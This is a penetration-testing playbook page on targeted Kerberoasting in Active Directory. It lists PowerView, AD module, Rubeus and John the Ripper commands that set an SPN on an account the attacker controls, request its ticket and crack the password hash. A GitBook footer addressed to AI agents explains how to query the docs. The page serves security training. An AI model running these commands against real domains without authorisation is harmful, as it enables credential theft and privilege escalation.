> For the complete documentation index, see [llms.txt](https://playbook.sidthoviti.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://playbook.sidthoviti.com/active-directory-pentest/domain-privilege-escalation/targeted-kerberoasting/set-spn.md). # Set SPN This abuse can be carried out when controlling an object that has a `GenericAll`, `GenericWrite`, `WriteProperty` or `Validated-SPN` over the target. A member of the Account Operator group usually has those permissions. The attacker can add an SPN (`ServicePrincipalName`) to that account. Once the account has an SPN, it becomes vulnerable to Kerberoasting. ### Targeted Kerberoasting - Set SPN * With GenericAll or GenericWrite, a target user's SPN can be set to anything that is unique in the forest. * We can request a TGS without special privilges. The TGS can be Kerberoasted. Enumerate permissions for RDPUsers on ACLs using PowerView: {% code overflow="wrap" %} ```powershell Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"} ``` {% endcode %} Check if the user already has a SPN set: {% code overflow="wrap" %} ```powershell # Powerview Get-DomainUser -Identity supportuser | select serviceprincipalname # AD module Get-ADUser -Identity supportuser -Properties ServicePrincipalName | select ServicePrincipalName ``` {% endcode %} Set SPN for the user {% code overflow="wrap" %} ```powershell # Powerview Set-DomainObject -Identity support1user -Set @{serviceprincipalname=‘dcorp/whatever1'} # AD module Set-ADUser -Identity support1user -ServicePrincipalNames @{Add=‘dcorp/whatever1'} ``` {% endcode %} Kerberoast the user: {% code overflow="wrap" %} ```powershell Rubeus.exe kerberoast /outfile:targetedhashes.txt john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\targetedhashes.txt ``` {% endcode %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://playbook.sidthoviti.com/active-directory-pentest/domain-privilege-escalation/targeted-kerberoasting/set-spn.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.